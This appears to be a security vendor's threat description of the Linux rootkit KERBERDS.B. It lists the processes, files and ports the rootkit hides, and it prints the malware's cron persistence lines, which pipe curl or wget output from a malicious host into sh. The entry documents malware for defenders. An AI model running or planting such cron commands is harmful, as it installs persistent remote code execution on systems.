Rootkit.Linux.KERBERDS.B

This Rootkit arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be dropped by other malware.

Arrival Details

This Rootkit arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be dropped by the following malware:

• Trojan.Linux.KERBERDS.UWEJL

Other Details

This Rootkit does the following:

• It is used by Trojan.Linux.KERBERDS.UWEJL for its rootkit capabilities.
• It displays a fake instance of the CPU usage.
• It hides processes with the following names:
  • defr_wqs
  • a64-unpacked
• It hides files with names containing any of the following strings:
  • defr_wqs
  • ld.so.preload
  • libBrokenLocalec.so
• It hides TCP connections which satisfy any of the following conditions:
  • Local TCP port = 51640
  • Remote TCP port = 51640
  • Remote TCP port = 6379
  • Remote TCP port = 22
• It connects to the following URL(s) to download and execute another shell script:
  • http://lsd.{BLOCKED}ten.org
• It creates the following cron jobs to enable automatic execution of a shell script found in lsd.{BLOCKED}ten.org:
  • Path: /etc/cron.d/root
    Schedule: Every 10 minutes
    Command: */10 * * * * root (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh
  • Path: /var/spool/cron/root
    Schedule: Every 15 minutes
    Command: */15 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh
  • Path: /var/spool/cron/crontabs/root
    Schedule: Every 30 minutes
    Command: */30 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh